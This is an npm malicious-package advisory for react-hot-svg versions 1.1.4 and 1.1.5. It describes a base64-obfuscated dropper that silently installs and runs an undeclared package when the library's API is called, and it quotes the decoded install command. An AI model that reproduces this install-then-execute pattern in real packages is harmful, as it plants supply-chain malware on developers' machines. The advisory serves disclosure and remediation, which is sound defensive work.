npm · Malicious package advisory
Malwarereact-hot-svg
MAL-2026-10439
Malicious code in react-hot-svg (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (847fe0ea93982597b0611e6fd23f1b77af40b7162baf338659fbff8deb7fb051) index.js in react-hot-svg 1.1.4 hides both a shell command and a package name as base64 strings named `svgValidateKey` and `svgValidatePattern`. When any of the exported API surface (`getPlugin`, `setPlugin`, `validateSvgContent`) is invoked, the code decodes `svgValidateKey` via `atob` to the string `npm install rollup-plugin-polyfill-handler --no-save --silent --no-audit --no-fund`, spawns it via `child_process.spawn` with `stdio: 'ignore'`, and on process exit `require()`s the base64-decoded module name `rollup-plugin-polyfill-handler` and immediately invokes its `.getPlugin()()` function. The `--no-save --silent --no-audit --no-fund` flags suppress output and prevent the added dependency from appearing in package.json or the lockfile. The obfuscation of both the command and the required module name, the SVG-themed cover identifiers, and the pattern of installing-then-requiring-then-executing an undeclared external package match a dropper that lands and executes attacker-controlled code from a separate npm package on any consumer who uses this library's advertised API.
Compromised versions (2)
- 1.1.5
- 1.1.4
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.